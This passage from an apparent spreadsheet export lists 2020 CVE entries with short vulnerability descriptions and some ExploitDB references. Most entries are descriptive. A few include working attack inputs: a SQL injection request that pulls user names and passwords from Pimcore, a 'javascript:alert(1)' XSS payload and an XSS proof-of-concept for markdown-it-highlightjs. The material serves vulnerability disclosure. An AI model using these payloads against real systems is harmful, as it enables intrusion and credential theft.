    <t>CVE-2020-7674</t>
  </si>
  <si>
    <t>access-policy through 3.1.0 is vulnerable to Arbitrary Code Execution. User input provided to the `template` function is executed by the `eval` function resulting in code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7675</t>
  </si>
  <si>
    <t>cd-messenger through 2.7.26 is vulnerable to Arbitrary Code Execution. User input provided to the `color` argument executed by the `eval` function resulting in code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7676</t>
  </si>
  <si>
    <t>angular.js prior to 1.8.0 allows cross site scripting. The regex-based input HTML replacement may turn sanitized code into unsanitized one. Wrapping "&lt;option&gt;" elements in "&lt;select&gt;" ones changes parsing behavior, leading to possibly unsanitizing code.</t>
  </si>
  <si>
    <t>CVE-2020-7677</t>
  </si>
  <si>
    <t>This affects the package thenify before 3.3.1. The name argument provided to the package can be controlled by users without any sanitization, and this is provided to the eval function without any sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-7678</t>
  </si>
  <si>
    <t>This affects all versions of package node-import. The "params" argument of module function can be controlled by users without any sanitization.b. This is then provided to the “eval” function located in line 79 in the index file "index.js".</t>
  </si>
  <si>
    <t>CVE-2020-7679</t>
  </si>
  <si>
    <t>In all versions of package casperjs, the mergeObjects utility function is susceptible to Prototype Pollution.</t>
  </si>
  <si>
    <t>CVE-2020-7680</t>
  </si>
  <si>
    <t>docsify prior to 4.11.4 is susceptible to Cross-site Scripting (XSS). Docsify.js uses fragment identifiers (parameters after # sign) to load resources from server-side .md files. Due to lack of validation here, it is possible to provide external URLs after the /#/ (domain.com/#//attacker.com) and render arbitrary JavaScript/HTML inside docsify page.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48681.txt</t>
  </si>
  <si>
    <t>Docsify.js 4.11.4 - Reflective Cross-Site Scripting</t>
  </si>
  <si>
    <t>2020-07-22</t>
  </si>
  <si>
    <t>CVE-2020-7681</t>
  </si>
  <si>
    <t>This affects all versions of package marscode. There is no path sanitization in the path provided at fs.readFile in index.js.</t>
  </si>
  <si>
    <t>CVE-2020-7682</t>
  </si>
  <si>
    <t>This affects all versions of package marked-tree. There is no path sanitization in the path provided at fs.readFile in index.js.</t>
  </si>
  <si>
    <t>CVE-2020-7683</t>
  </si>
  <si>
    <t>This affects all versions of package rollup-plugin-server. There is no path sanitization in readFile operation performed inside the readFileFromContentBase function.</t>
  </si>
  <si>
    <t>CVE-2020-7684</t>
  </si>
  <si>
    <t>This affects all versions of package rollup-plugin-serve. There is no path sanitization in readFile operation.</t>
  </si>
  <si>
    <t>CVE-2020-7685</t>
  </si>
  <si>
    <t>This affects all versions of package UmbracoForms. When using the default configuration for upload forms, it is possible to upload arbitrary file types. The package offers a way for users to mitigate the issue. The users of this package can create a custom workflow and frontend validation that blocks certain file types, depending on their security needs and policies.</t>
  </si>
  <si>
    <t>CVE-2020-7686</t>
  </si>
  <si>
    <t>This affects all versions of package rollup-plugin-dev-server. There is no path sanitization in readFile operation inside the readFileFromContentBase function.</t>
  </si>
  <si>
    <t>CVE-2020-7687</t>
  </si>
  <si>
    <t>This affects all versions of package fast-http. There is no path sanitization in the path provided at fs.readFile in index.js.</t>
  </si>
  <si>
    <t>CVE-2020-7688</t>
  </si>
  <si>
    <t>The issue occurs because tagName user input is formatted inside the exec function is executed without any checks.</t>
  </si>
  <si>
    <t>CVE-2020-7689</t>
  </si>
  <si>
    <t>Data is truncated wrong when its length is greater than 255 bytes.</t>
  </si>
  <si>
    <t>CVE-2020-7690</t>
  </si>
  <si>
    <t>All affected versions &lt;2.0.0 of package jspdf are vulnerable to Cross-site Scripting (XSS). It is possible to inject JavaScript code via the html method.</t>
  </si>
  <si>
    <t>CVE-2020-7691</t>
  </si>
  <si>
    <t>In all versions of the package jspdf, it is possible to use &lt;&lt;script&gt;script&gt; in order to go over the filtering regex.</t>
  </si>
  <si>
    <t>CVE-2020-7692</t>
  </si>
  <si>
    <t>PKCE support is not implemented in accordance with the RFC for OAuth 2.0 for Native Apps. Without the use of PKCE, the authorization code returned by an authorization server is not enough to guarantee that the client that issued the initial authorization request is the one that will be authorized. An attacker is able to obtain the authorization code using a malicious app on the client-side and use it to gain authorization to the protected resource. This affects the package com.google.oauth-client:google-oauth-client before 1.31.0.</t>
  </si>
  <si>
    <t>CVE-2020-7693</t>
  </si>
  <si>
    <t>Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.</t>
  </si>
  <si>
    <t>CVE-2020-7694</t>
  </si>
  <si>
    <t>This affects all versions of package uvicorn. The request logger provided by the package is vulnerable to ASNI escape sequence injection. Whenever any HTTP request is received, the default behaviour of uvicorn is to log its details to either the console or a log file. When attackers request crafted URLs with percent-encoded escape sequences, the logging component will log the URL after it's been processed with urllib.parse.unquote, therefore converting any percent-encoded characters into their single-character equivalent, which can have special meaning in terminal emulators. By requesting URLs with crafted paths, attackers can: * Pollute uvicorn's access logs, therefore jeopardising the integrity of such files. * Use ANSI sequence codes to attempt to interact with the terminal emulator that's displaying the logs (either in real time or from a file).</t>
  </si>
  <si>
    <t>CVE-2020-7695</t>
  </si>
  <si>
    <t>Uvicorn before 0.11.7 is vulnerable to HTTP response splitting. CRLF sequences are not escaped in the value of HTTP headers. Attackers can exploit this to add arbitrary headers to HTTP responses, or even return an arbitrary response body, whenever crafted input is used to construct HTTP headers.</t>
  </si>
  <si>
    <t>CVE-2020-7696</t>
  </si>
  <si>
    <t>This affects all versions of package react-native-fast-image. When an image with source={{uri: "...", headers: { host: "somehost.com", authorization: "..." }} is loaded, all other subsequent images will use the same headers, this can lead to signing credentials or other session tokens being leaked to other servers.</t>
  </si>
  <si>
    <t>CVE-2020-7697</t>
  </si>
  <si>
    <t>This affects all versions of package mock2easy. a malicious user could inject commands through the _data variable: Affected Area require('../server/getJsonByCurl')(mock2easy, function (error, stdout) { if (error) { return res.json(500, error); } res.json(JSON.parse(stdout)); }, '', _data.interfaceUrl, query, _data.cookie,_data.interfaceType);</t>
  </si>
  <si>
    <t>CVE-2020-7698</t>
  </si>
  <si>
    <t>This affects the package Gerapy from 0 and before 0.9.3. The input being passed to Popen, via the project_configure endpoint, isn’t being sanitized.</t>
  </si>
  <si>
    <t>CVE-2020-7699</t>
  </si>
  <si>
    <t>This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7700</t>
  </si>
  <si>
    <t>All versions of phpjs are vulnerable to Prototype Pollution via parse_str.</t>
  </si>
  <si>
    <t>CVE-2020-7701</t>
  </si>
  <si>
    <t>madlib-object-utils before 0.1.7 is vulnerable to Prototype Pollution via setValue.</t>
  </si>
  <si>
    <t>CVE-2020-7702</t>
  </si>
  <si>
    <t>All versions of package templ8 are vulnerable to Prototype Pollution via the parse function.</t>
  </si>
  <si>
    <t>CVE-2020-7703</t>
  </si>
  <si>
    <t>All versions of package nis-utils are vulnerable to Prototype Pollution via the setValue function.</t>
  </si>
  <si>
    <t>CVE-2020-7704</t>
  </si>
  <si>
    <t>The package linux-cmdline before 1.0.1 are vulnerable to Prototype Pollution via the constructor.</t>
  </si>
  <si>
    <t>CVE-2020-7705</t>
  </si>
  <si>
    <t>This affects the package MintegralAdSDK from 0.0.0. The SDK distributed by the company contains malicious functionality that tracks any URL opened by the app and reports it back to the company, along with performing advertisement attribution fraud. Mintegral can remotely activate hooks on the UIApplication, openURL, SKStoreProductViewController, loadProductWithParameters and NSURLProtocol methods along with anti-debug and proxy detection protection. If those hooks are active MintegralAdSDK sends obfuscated data about every opened URL in an application to their servers. Note that the malicious functionality is enabled even if the SDK was not enabled to serve ads.</t>
  </si>
  <si>
    <t>CVE-2020-7706</t>
  </si>
  <si>
    <t>The package connie-lang before 0.1.1 are vulnerable to Prototype Pollution in the configuration language library used by connie.</t>
  </si>
  <si>
    <t>CVE-2020-7707</t>
  </si>
  <si>
    <t>The package property-expr before 2.0.3 are vulnerable to Prototype Pollution via the setter function.</t>
  </si>
  <si>
    <t>CVE-2020-7708</t>
  </si>
  <si>
    <t>The package irrelon-path before 4.7.0; the package @irrelon/path before 4.7.0 are vulnerable to Prototype Pollution via the set, unSet, pushVal and pullVal functions.</t>
  </si>
  <si>
    <t>CVE-2020-7709</t>
  </si>
  <si>
    <t>This affects the package json-pointer before 0.6.1. Multiple reference of object using slash is supported.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-7710</t>
  </si>
  <si>
    <t>This affects all versions of package safe-eval. It is possible for an attacker to run an arbitrary command on the host machine.</t>
  </si>
  <si>
    <t>CVE-2020-7711</t>
  </si>
  <si>
    <t>This affects all versions of package github.com/russellhaering/goxmldsig. There is a crash on nil-pointer dereference caused by sending malformed XML signatures.</t>
  </si>
  <si>
    <t>CVE-2020-7712</t>
  </si>
  <si>
    <t>This affects the package json before 10.0.0. It is possible to inject arbritary commands using the parseLookup function.</t>
  </si>
  <si>
    <t>CVE-2020-7713</t>
  </si>
  <si>
    <t>All versions of package arr-flatten-unflatten are vulnerable to Prototype Pollution via the constructor.</t>
  </si>
  <si>
    <t>CVE-2020-7714</t>
  </si>
  <si>
    <t>All versions of package confucious are vulnerable to Prototype Pollution via the set function.</t>
  </si>
  <si>
    <t>CVE-2020-7715</t>
  </si>
  <si>
    <t>All versions of package deep-get-set are vulnerable to Prototype Pollution via the main function.</t>
  </si>
  <si>
    <t>CVE-2020-7716</t>
  </si>
  <si>
    <t>All versions of package deeps are vulnerable to Prototype Pollution via the set function.</t>
  </si>
  <si>
    <t>CVE-2020-7717</t>
  </si>
  <si>
    <t>All versions of package dot-notes are vulnerable to Prototype Pollution via the create function.</t>
  </si>
  <si>
    <t>CVE-2020-7718</t>
  </si>
  <si>
    <t>All versions of package gammautils are vulnerable to Prototype Pollution via the deepSet and deepMerge functions.</t>
  </si>
  <si>
    <t>CVE-2020-7719</t>
  </si>
  <si>
    <t>Versions of package locutus before 2.0.12 are vulnerable to prototype Pollution via the php.strings.parse_str function.</t>
  </si>
  <si>
    <t>CVE-2020-7720</t>
  </si>
  <si>
    <t>The package node-forge before 0.10.0 is vulnerable to Prototype Pollution via the util.setPath function. Note: Version 0.10.0 is a breaking change removing the vulnerable functions.</t>
  </si>
  <si>
    <t>CVE-2020-7721</t>
  </si>
  <si>
    <t>All versions of package node-oojs are vulnerable to Prototype Pollution via the setPath function.</t>
  </si>
  <si>
    <t>CVE-2020-7722</t>
  </si>
  <si>
    <t>All versions of package nodee-utils are vulnerable to Prototype Pollution via the deepSet function.</t>
  </si>
  <si>
    <t>CVE-2020-7723</t>
  </si>
  <si>
    <t>All versions of package promisehelpers are vulnerable to Prototype Pollution via the insert function.</t>
  </si>
  <si>
    <t>CVE-2020-7724</t>
  </si>
  <si>
    <t>All versions of package tiny-conf are vulnerable to Prototype Pollution via the set function.</t>
  </si>
  <si>
    <t>CVE-2020-7725</t>
  </si>
  <si>
    <t>All versions of package worksmith are vulnerable to Prototype Pollution via the setValue function.</t>
  </si>
  <si>
    <t>CVE-2020-7726</t>
  </si>
  <si>
    <t>All versions of package safe-object2 are vulnerable to Prototype Pollution via the setter function.</t>
  </si>
  <si>
    <t>CVE-2020-7727</t>
  </si>
  <si>
    <t>All versions of package gedi are vulnerable to Prototype Pollution via the set function.</t>
  </si>
  <si>
    <t>CVE-2020-7729</t>
  </si>
  <si>
    <t>The package grunt before 1.3.0 are vulnerable to Arbitrary Code Execution due to the default usage of the function load() instead of its secure replacement safeLoad() of the package js-yaml inside grunt.file.readYAML.</t>
  </si>
  <si>
    <t>CVE-2020-7730</t>
  </si>
  <si>
    <t>The package bestzip before 2.1.7 are vulnerable to Command Injection via the options param.</t>
  </si>
  <si>
    <t>CVE-2020-7731</t>
  </si>
  <si>
    <t>This affects all versions of package github.com/russellhaering/gosaml2. There is a crash on nil-pointer dereference caused by sending malformed XML signatures.</t>
  </si>
  <si>
    <t>CVE-2020-7733</t>
  </si>
  <si>
    <t>The package ua-parser-js before 0.7.22 are vulnerable to Regular Expression Denial of Service (ReDoS) via the regex for Redmi Phones and Mi Pad Tablets UA.</t>
  </si>
  <si>
    <t>CVE-2020-7734</t>
  </si>
  <si>
    <t>All versions of package cabot are vulnerable to Cross-site Scripting (XSS) via the Endpoint column.</t>
  </si>
  <si>
    <t>CVE-2020-7735</t>
  </si>
  <si>
    <t>The package ng-packagr before 10.1.1 are vulnerable to Command Injection via the styleIncludePaths option.</t>
  </si>
  <si>
    <t>CVE-2020-7736</t>
  </si>
  <si>
    <t>The package bmoor before 0.8.12 are vulnerable to Prototype Pollution via the set function.</t>
  </si>
  <si>
    <t>CVE-2020-7737</t>
  </si>
  <si>
    <t>All versions of package safetydance are vulnerable to Prototype Pollution via the set function.</t>
  </si>
  <si>
    <t>CVE-2020-7738</t>
  </si>
  <si>
    <t>All versions of package shiba are vulnerable to Arbitrary Code Execution due to the default usage of the function load() of the package js-yaml instead of its secure replacement , safeLoad().</t>
  </si>
  <si>
    <t>CVE-2020-7739</t>
  </si>
  <si>
    <t>This affects all versions of package phantomjs-seo. It is possible for an attacker to craft a url that will be passed to a PhantomJS instance allowing for an SSRF attack.</t>
  </si>
  <si>
    <t>CVE-2020-7740</t>
  </si>
  <si>
    <t>This affects all versions of package node-pdf-generator. Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a url that will be passed to an external server allowing an SSRF attack.</t>
  </si>
  <si>
    <t>CVE-2020-7741</t>
  </si>
  <si>
    <t>This affects the package hellojs before 1.18.6. The code get the param oauth_redirect from url and pass it to location.assign without any check and sanitisation. So we can simply pass some XSS payloads into the url param oauth_redirect, such as javascript:alert(1).</t>
  </si>
  <si>
    <t>CVE-2020-7742</t>
  </si>
  <si>
    <t>This affects the package simpl-schema before 1.10.2.</t>
  </si>
  <si>
    <t>CVE-2020-7743</t>
  </si>
  <si>
    <t>The package mathjs before 7.5.1 are vulnerable to Prototype Pollution via the deepExtend function that runs upon configuration updates.</t>
  </si>
  <si>
    <t>CVE-2020-7744</t>
  </si>
  <si>
    <t>This affects all versions of package com.mintegral.msdk:alphab. The Android SDK distributed by the company contains malicious functionality in this module that tracks: 1. Downloads from Google urls either within Google apps or via browser including file downloads, e-mail attachments and Google Docs links. 2. All apk downloads, either organic or not. Mintegral listens to download events in Android's download manager and detects if the downloaded file's url contains: a. google.com or comes from a Google app (the com.android.vending package) b. Ends with .apk for apk downloads In both cases, the module sends the captured data back to Mintegral's servers. Note that the malicious functionality keeps running even if the app is currently not in focus (running in the background).</t>
  </si>
  <si>
    <t>CVE-2020-7745</t>
  </si>
  <si>
    <t>This affects the package MintegralAdSDK before 6.6.0.0. The SDK distributed by the company contains malicious functionality that acts as a backdoor. Mintegral and their partners (advertisers) can remotely execute arbitrary code on a user device.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-7746</t>
  </si>
  <si>
    <t>This affects the package chart.js before 2.9.4. The options parameter is not properly sanitized when it is processed. When the options are processed, the existing options (or the defaults options) are deeply merged with provided options. However, during this operation, the keys of the object being set are not checked, leading to a prototype pollution.</t>
  </si>
  <si>
    <t>CVE-2020-7747</t>
  </si>
  <si>
    <t>This affects all versions of package lightning-server. It is possible to inject malicious JavaScript code as part of a session controller.</t>
  </si>
  <si>
    <t>CVE-2020-7748</t>
  </si>
  <si>
    <t>This affects the package @tsed/core before 5.65.7. This vulnerability relates to the deepExtend function which is used as part of the utils directory. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.</t>
  </si>
  <si>
    <t>CVE-2020-7749</t>
  </si>
  <si>
    <t>This affects all versions of package osm-static-maps. User input given to the package is passed directly to a template without escaping ({{{ ... }}}). As such, it is possible for an attacker to inject arbitrary HTML/JS code and depending on the context. It will be outputted as an HTML on the page which gives opportunity for XSS or rendered on the server (puppeteer) which also gives opportunity for SSRF and Local File Read.</t>
  </si>
  <si>
    <t>CVE-2020-7750</t>
  </si>
  <si>
    <t>This affects the package scratch-svg-renderer before 0.2.0-prerelease.20201019174008. The loadString function does not escape SVG properly, which can be used to inject arbitrary elements into the DOM via the _transformMeasurements function.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/50079.txt</t>
  </si>
  <si>
    <t>Scratch Desktop 3.17 - Remote Code Execution</t>
  </si>
  <si>
    <t>2021-07-02</t>
  </si>
  <si>
    <t>CVE-2020-7751</t>
  </si>
  <si>
    <t>pathval before version 1.1.1 is vulnerable to prototype pollution.</t>
  </si>
  <si>
    <t>CVE-2020-7752</t>
  </si>
  <si>
    <t>This affects the package systeminformation before 4.27.11. This package is vulnerable to Command Injection. The attacker can concatenate curl's parameters to overwrite Javascript files and then execute any OS commands.</t>
  </si>
  <si>
    <t>CVE-2020-7753</t>
  </si>
  <si>
    <t>All versions of package trim are vulnerable to Regular Expression Denial of Service (ReDoS) via trim().</t>
  </si>
  <si>
    <t>CVE-2020-7754</t>
  </si>
  <si>
    <t>This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters.</t>
  </si>
  <si>
    <t>CVE-2020-7755</t>
  </si>
  <si>
    <t>All versions of package dat.gui are vulnerable to Regular Expression Denial of Service (ReDoS) via specifically crafted rgb and rgba values.</t>
  </si>
  <si>
    <t>CVE-2020-7757</t>
  </si>
  <si>
    <t>This affects all versions of package droppy. It is possible to traverse directories to fetch configuration files from a droopy server.</t>
  </si>
  <si>
    <t>CVE-2020-7758</t>
  </si>
  <si>
    <t>This affects versions of package browserless-chrome before 1.40.2-chrome-stable. User input flowing from the workspace endpoint gets used to create a file path filePath and this is fetched and then sent back to a user. This can be escaped to fetch arbitrary files from a server.</t>
  </si>
  <si>
    <t>CVE-2020-7759</t>
  </si>
  <si>
    <t>The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{"keyId"%3a"''","groupId"%3a"'asd'))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,'',11,12,'',14+from+users)+--+"}]</t>
  </si>
  <si>
    <t>CVE-2020-7760</t>
  </si>
  <si>
    <t>This affects the package codemirror before 5.58.2; the package org.apache.marmotta.webjars:codemirror before 5.58.2. The vulnerable regular expression is located in https://github.com/codemirror/CodeMirror/blob/cdb228ac736369c685865b122b736cd0d397836c/mode/javascript/javascript.jsL129. The ReDOS vulnerability of the regex is mainly due to the sub-pattern (s|/*.*?*/)*</t>
  </si>
  <si>
    <t>CVE-2020-7761</t>
  </si>
  <si>
    <t>This affects the package @absolunet/kafe before 3.2.10. It allows cause a denial of service when validating crafted invalid emails.</t>
  </si>
  <si>
    <t>CVE-2020-7762</t>
  </si>
  <si>
    <t>This affects the package jsreport-chrome-pdf before 1.10.0.</t>
  </si>
  <si>
    <t>CVE-2020-7763</t>
  </si>
  <si>
    <t>This affects the package phantom-html-to-pdf before 0.6.1.</t>
  </si>
  <si>
    <t>CVE-2020-7764</t>
  </si>
  <si>
    <t>This affects the package find-my-way before 2.2.5, from 3.0.0 and before 3.0.5. It accepts the Accept-Version' header by default, and if versioned routes are not being used, this could lead to a denial of service. Accept-Version can be used as an unkeyed header in a cache poisoning attack.</t>
  </si>
  <si>
    <t>CVE-2020-7765</t>
  </si>
  <si>
    <t>This affects the package @firebase/util before 0.3.4. This vulnerability relates to the deepExtend function within the DeepCopy.ts file. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.</t>
  </si>
  <si>
    <t>CVE-2020-7766</t>
  </si>
  <si>
    <t>This affects all versions of package json-ptr. The issue occurs in the set operation (https://flitbit.github.io/json-ptr/classes/_src_pointer_.jsonpointer.htmlset) when the force flag is set to true. The function recursively set the property in the target object, however it does not properly check the key being set, leading to a prototype pollution.</t>
  </si>
  <si>
    <t>CVE-2020-7767</t>
  </si>
  <si>
    <t>All versions of package express-validators are vulnerable to Regular Expression Denial of Service (ReDoS) when validating specifically-crafted invalid urls.</t>
  </si>
  <si>
    <t>CVE-2020-7768</t>
  </si>
  <si>
    <t>The package grpc before 1.24.4; the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition.</t>
  </si>
  <si>
    <t>CVE-2020-7769</t>
  </si>
  <si>
    <t>This affects the package nodemailer before 6.4.16. Use of crafted recipient email addresses may result in arbitrary command flag injection in sendmail transport for sending mails.</t>
  </si>
  <si>
    <t>CVE-2020-7770</t>
  </si>
  <si>
    <t>This affects the package json8 before 1.0.3. The function adds in the target object the property specified in the path, however it does not properly check the key being set, leading to a prototype pollution.</t>
  </si>
  <si>
    <t>CVE-2020-7771</t>
  </si>
  <si>
    <t>The package asciitable.js before 1.0.3 are vulnerable to Prototype Pollution via the main function.</t>
  </si>
  <si>
    <t>CVE-2020-7772</t>
  </si>
  <si>
    <t>This affects the package doc-path before 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-7773</t>
  </si>
  <si>
    <t>This affects the package markdown-it-highlightjs before 3.3.1. It is possible insert malicious JavaScript as a value of lang in the markdown-it-highlightjs Inline code highlighting feature. const markdownItHighlightjs = require("markdown-it-highlightjs"); const md = require('markdown-it'); const reuslt_xss = md() .use(markdownItHighlightjs, { inline: true }) .render('console.log(42){."&gt;js}'); console.log(reuslt_xss);</t>
  </si>
  <si>
    <t>CVE-2020-7774</t>
  </si>
  <si>
    <t>The package y18n before 3.2.2, 4.0.1 and 5.0.5, is vulnerable to Prototype Pollution.</t>
  </si>
  <si>
    <t>CVE-2020-7775</t>
  </si>
  <si>
    <t>This affects all versions of package freediskspace. The vulnerability arises out of improper neutralization of arguments in line 71 of freediskspace.js.</t>
  </si>
  <si>
    <t>CVE-2020-7776</t>
  </si>
  <si>
    <t>This affects the package phpoffice/phpspreadsheet from 0.0.0. The library is vulnerable to XSS when creating an html output from an excel file by adding a comment on any cell. The root cause of this issue is within the HTML writer where user comments are concatenated as part of link and this is returned as HTML. A fix for this issue is available on commit 0ed5b800be2136bcb8fa9c1bdf59abc957a98845/master branch.</t>
  </si>
  <si>
    <t>CVE-2020-7777</t>
  </si>
  <si>
    <t>This affects all versions of package jsen. If an attacker can control the schema file, it could run arbitrary JavaScript code on the victim machine. In the module description and README file there is no mention about the risks of untrusted schema files, so I assume that this is applicable. In particular the required field of the schema is not properly sanitized. The resulting string that is build based on the schema definition is then passed to a Function.apply();, leading to an Arbitrary Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-7778</t>
  </si>
  <si>
    <t>This affects the package systeminformation before 4.30.2. The attacker can overwrite the properties and functions of an object, which can lead to executing OS commands.</t>
  </si>
  <si>
    <t>CVE-2020-7779</t>
  </si>
  <si>
    <t>All versions of package djvalidator are vulnerable to Regular Expression Denial of Service (ReDoS) by sending crafted invalid emails - for example, --@------------------------------------------------------------------------------------------------------------------------!.</t>
  </si>
  <si>
    <t>CVE-2020-7780</t>
  </si>
  <si>
    <t>This affects the package com.softwaremill.akka-http-session:core_2.13 before 0.5.11; the package com.softwaremill.akka-http-session:core_2.12 before 0.5.11; the package com.softwaremill.akka-http-session:core_2.11 before 0.5.11. For older versions, endpoints protected by randomTokenCsrfProtection could be bypassed with an empty X-XSRF-TOKEN header and an empty XSRF-TOKEN cookie.</t>
  </si>
  <si>
    <t>CVE-2020-7781</t>
  </si>
  <si>
    <t>This affects the package connection-tester before 0.2.1. The injection point is located in line 15 in index.js. The following PoC demonstrates the vulnerability:</t>
  </si>
  <si>
    <t>CVE-2020-7782</t>
  </si>
  <si>
    <t>This affects all versions of package spritesheet-js. It depends on a vulnerable package platform-command. The injection point is located in line 32 in lib/generator.js, which is triggered by main entry of the package.</t>
  </si>
  <si>
    <t>CVE-2020-7784</t>
  </si>
  <si>
    <t>This affects all versions of package ts-process-promises. The injection point is located in line 45 in main entry of package in lib/process-promises.js. The vulnerability is demonstrated with the following PoC:</t>
  </si>
  <si>
    <t>CVE-2020-7785</t>
  </si>
  <si>
    <t>This affects all versions of package node-ps. The injection point is located in line 72 in lib/index.js.</t>
  </si>
  <si>
    <t>CVE-2020-7786</t>
  </si>
  <si>
    <t>This affects all versions of package macfromip. The injection point is located in line 66 in macfromip.js.</t>
  </si>
  <si>
    <t>CVE-2020-7787</t>
  </si>
  <si>
    <t>This affects all versions of package react-adal. It is possible for a specially crafted JWT token and request URL can cause the nonce, session and refresh values to be incorrectly validated, causing the application to treat an attacker-generated JWT token as authentic. The logical defect is caused by how the nonce, session and refresh values are stored in the browser local storage or session storage. Each key is automatically appended by ||. When the received nonce and session keys are generated, the list of values is stored in the browser storage, separated by ||, with || always appended to the end of the list. Since || will always be the last 2 characters of the stored values, an empty string ("") will always be in the list of the valid values. Therefore, if an empty session parameter is provided in the callback URL, and a specially-crafted JWT token contains an nonce value of "" (empty string), then adal.js will consider the JWT token as authentic.</t>
  </si>
  <si>
    <t>CVE-2020-7788</t>
  </si>
  <si>
    <t>This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.</t>
  </si>
  <si>
    <t>CVE-2020-7789</t>
  </si>
  <si>
    <t>This affects the package node-notifier before 9.0.0. It allows an attacker to run arbitrary commands on Linux machines due to the options params not being sanitised when being passed an array.</t>
  </si>
  <si>
    <t>CVE-2020-7790</t>
  </si>
  <si>
    <t>This affects the package spatie/browsershot from 0.0.0. By specifying a URL in the file:// protocol an attacker is able to include arbitrary files in the resultant PDF.</t>
  </si>
  <si>
    <t>CVE-2020-7791</t>
  </si>
  <si>
    <t>This affects the package i18n before 2.1.15. Vulnerability arises out of insufficient handling of erroneous language tags in src/i18n/Concrete/TextLocalizer.cs and src/i18n/LocalizedApplication.cs.</t>
  </si>
  <si>
    <t>CVE-2020-7792</t>
  </si>
  <si>
    <t>This affects all versions of package mout. The deepFillIn function can be used to 'fill missing properties recursively', while the deepMixIn 'mixes objects into the target object, recursively mixing existing child objects as well'. In both cases, the key used to access the target object recursively is not checked, leading to a Prototype Pollution.</t>
  </si>
  <si>
    <t>CVE-2020-7793</t>
  </si>
  <si>
    <t>The package ua-parser-js before 0.7.23 are vulnerable to Regular Expression Denial of Service (ReDoS) in multiple regexes (see linked commit for more info).</t>
  </si>
  <si>
    <t>CVE-2020-7794</t>
  </si>
  <si>
    <t>This affects all versions of package buns. The injection point is located in line 678 in index file lib/index.js in the exported function install(requestedModule).</t>
  </si>
  <si>
    <t>CVE-2020-7795</t>
  </si>
  <si>
    <t>The package get-npm-package-version before 1.0.7 are vulnerable to Command Injection via main function in index.js.</t>
  </si>
  <si>
    <t>CVE-2020-7796</t>
  </si>
  <si>
    <t>Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-7799</t>
  </si>
  <si>
    <t>An issue was discovered in FusionAuth before 1.11.0. An authenticated user, allowed to edit e-mail templates (Home -&gt; Settings -&gt; Email Templates) or themes (Home -&gt; Settings -&gt; Themes), can execute commands on the underlying operating system by abusing freemarker.template.utility.Execute in the Apache FreeMarker engine that processes custom templates.</t>
  </si>
  <si>
    <t>CVE-2020-7800</t>
  </si>
  <si>
    <t>The Synergy Systems &amp; Solutions (SSS) HUSKY RTU 6049-E70, with firmware Versions 5.0 and prior, has an Improper Check for Unusual or Exceptional Conditions (CWE-754) vulnerability. The affected product is vulnerable to specially crafted TCP packets, which can cause the device to shut down or reboot and lose configuration settings. This is a different issue than CVE-2019-16879, CVE-2019-20045, CVE-2019-20046, CVE-2020-7801, and CVE-2020-7802.</t>
  </si>
  <si>
    <t>CVE-2020-7801</t>
  </si>
  <si>
    <t>The Synergy Systems &amp; Solutions (SSS) HUSKY RTU 6049-E70, with firmware Versions 5.0 and prior, has an Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) vulnerability. The affected product is vulnerable to information exposure over the SNMP protocol. This is a different issue than CVE-2019-16879, CVE-2019-20045, CVE-2019-20046, CVE-2020-7800, and CVE-2020-7802.</t>
  </si>
  <si>
    <t>CVE-2020-7802</t>
  </si>
  <si>
    <t>The Synergy Systems &amp; Solutions (SSS) HUSKY RTU 6049-E70, with firmware Versions 5.0 and prior, has an Incorrect Default Permissions (CWE-276) vulnerability. The affected product is vulnerable to insufficient default permissions, which could allow an attacker to view network configurations through SNMP communication. This is a different issue than CVE-2019-16879, CVE-2019-20045, CVE-2019-20046, CVE-2020-7800, and CVE-2020-7801.</t>
  </si>
  <si>
    <t>CVE-2020-7803</t>
  </si>
  <si>
    <t>IMGTech Co,Ltd ZInsX.ocx ActiveX Control in Zoneplayer 2.0.1.3, version 2.0.1.4 and prior versions on Windows. File Donwload vulnerability in ZInsX.ocx of IMGTech Co,Ltd Zoneplayer allows attacker to cause arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7804</t>
  </si>
  <si>
    <t>ActiveX Control(HShell.dll) in Handy Groupware 1.7.3.1 for Windows 7, 8, and 10 allows an attacker to execute arbitrary command via the ShellExec method.</t>
  </si>
  <si>
    <t>CVE-2020-7805</t>
  </si>
  <si>
    <t>An issue was discovered on KT Slim egg IML500 (R7283, R8112, R8424) and IML520 (R8112, R8368, R8411) wifi device. This issue is a command injection allowing attackers to execute arbitrary OS commands.</t>
  </si>
  <si>
    <t>CVE-2020-7806</t>
  </si>
  <si>
